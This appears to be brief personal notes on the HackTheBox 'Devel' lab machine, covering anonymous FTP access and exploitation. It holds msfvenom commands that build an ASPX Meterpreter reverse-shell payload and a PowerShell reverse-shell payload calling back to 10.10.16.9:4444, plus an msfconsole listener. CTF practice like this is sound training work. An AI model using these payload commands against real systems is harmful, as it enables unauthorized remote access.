Devel HTB
Enumeration
We found anonymous access in ftp
FTP
Exploitation
We can use this cheatsheat: https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom and use the ASP/x payload.
To output the ex.aspx file with the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx > ex.aspx
we use
msfconsole
to listen on port 4444we can als0 use
msfvenom -p windows/powershell/powershell_reverse_tcp LHOST=10.10.16.9
to gain access without metasploit.
Last updated